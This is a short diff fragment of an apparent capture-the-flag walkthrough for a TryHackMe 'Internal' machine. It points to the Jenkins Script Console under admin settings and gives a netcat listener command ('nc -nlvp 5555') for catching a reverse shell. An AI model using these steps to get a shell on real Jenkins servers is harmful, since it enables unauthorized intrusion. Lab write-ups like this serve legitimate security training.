LNB283/THM/HARD/Internal/Internal_Wlakthrough.md

 If you move to **Manage Jenkins**, you have access to all settings available for admin.
 One is interesting:  **Script Console**

-- First* Start a listener
+- First: Start a listener
 ```
 nc -nlvp 5555
 ```